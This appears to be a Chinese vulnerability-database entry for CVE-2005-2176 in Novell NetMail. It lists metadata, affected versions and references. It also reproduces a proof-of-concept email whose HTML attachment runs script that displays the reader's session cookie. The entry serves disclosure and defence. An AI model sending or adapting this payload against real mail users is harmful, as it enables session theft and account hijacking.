Novell NetMail 弱安全机制漏洞-安全小百科

Novell NetMail 弱安全机制漏洞

漏洞ID	1108916	漏洞类型	输入验证
发布时间	2005-07-06	更新时间	2005-07-06
CVE编号	CVE-2005-2176	CNNVD-ID	CNNVD-200507-079
漏洞平台	Windows	CVSS评分	6.4

|漏洞来源

https://www.exploit-db.com/exploits/25948
https://www.securityfocus.com/bid/14171
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-079

|漏洞详情

NovellNetMail是一套电子邮件软件。NovellNetMail存在弱安全机制漏洞。由于NovellNetMail自动处理附件中的HTML，而不提示用户将其保存或打开，这使远程攻击者更易于执行基于web的攻击并窃取cookie。

|漏洞EXP

source: http://www.securityfocus.com/bid/14171/info

Novell NetMail email client is prone to an input validation vulnerability.

Reports indicate that HTML and JavaScript attached to received email messages is executed automatically, when the email message is viewed.

A successful attack may allow the attacker to obtain session cookies and carry out other attacks.

All versions are considered to be vulnerable at the moment. 

Content-Type: multipart/mixed; boundary="=_mixed 00279444C2257036_="

--=_mixed 00279444C2257036_=
Content-Type: text/html; charset="US-ASCII"


<br><font size=2 face="sans-serif">hi there</font>
<br>
--=_mixed 00279444C2257036_=
Content-Type: text/html; name="malxxx.html"
Content-Disposition: attachment; filename="malxxx.html"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<title>Test XSS of uploaded documents</title>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">

</HEAD>
<BODY>
<SCRIPT>
document.write('The cookie is:<br> ' + document.cookie + '<p>');
</SCRIPT>
</BODY></HTML>
--=_mixed 00279444C2257036_=--

|受影响的产品

Novell NetMail 3.52 C1

Novell NetMail 3.52 C

Novell NetMail 3.52 B

Novell NetMail 3.52 A

Novell NetMail 3.52

Novell NetMail 3.10 h

Novell NetMail 3.10 g

|参考资料

来源:BID
名称:14171
链接:http://www.securityfocus.com/bid/14171
来源:VUPEN
名称:ADV-2005-0994
链接:http://www.frsirt.com/english/advisories/2005/0994
来源:SECUNIA
名称:15962
链接:http://secunia.com/advisories/15962
来源:OSVDB
名称:17821
链接:http://www.osvdb.org/17821
来源:support.novell.com
链接:http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972438.htm
来源:support.novell.com
链接:http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972433.htm
来源:support.novell.com
链接:http://support.novell.com/cgi-bin/search/searchtid.cgi?/2972340.htm
来源:SECTRACK
名称:1014439
链接:http://securitytracker.com/id?1014439

相关推荐: BulletScript MailList – bsml.pl Information Disclosure

BulletScript MailList – bsml.pl Information Disclosure 漏洞ID 1054342 漏洞类型发布时间 2003-12-29 更新时间 2003-12-29 CVE编号 N/A CNNVD-ID N/A 漏洞…

文章版权归作者所有，未经允许请勿转载。

THE END